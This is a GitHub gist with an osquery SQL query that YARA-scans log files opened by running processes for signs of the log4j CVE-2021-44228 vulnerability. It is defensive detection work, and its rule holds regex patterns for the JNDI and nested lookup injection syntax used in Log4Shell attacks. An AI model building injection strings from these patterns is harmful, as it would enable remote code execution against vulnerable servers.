Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
A SQL query that can be run as a realtime query in osquery to yara scan all log files opened by processes running on a host to detect log4j vulnerability CVE-2021-44228
WITH
procs AS (
SELECT pid, name, cmdline
FROM processes
WHERE is_container_process = 0),
logs AS (
SELECT DISTINCT o.pid, o.path, p.name, p.cmdline
FROM process_open_files o
JOIN procs p USING (pid)
WHERE o.system_type = 'host'
AND o.path LIKE '%.log'
AND o.path NOT LIKE '%/osqueryd.worker%.log')
SELECT * FROM yara
JOIN logs USING (path)
WHERE count > 0
AND rule = '
rule log4j2JndiLookup {
meta:
author = "Uptycs Team"
description = "Detect indicator of comprimise for log4j2 vulnerability CVE-2021-44228 in log files"
license = "Apache License, Version 2.0"
version = "0.1"
strings:
// Check for ${jndi or ${ctx prefix matches
$prefix = /\$\{(jndi|ctx)/ ascii wide
// Look for patterns starting with "${", followed by anything except "}" and ending with "${"
$nested = /\$\{[^\}\r\n]*\$\{/ ascii wide
condition:
any of them
}'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment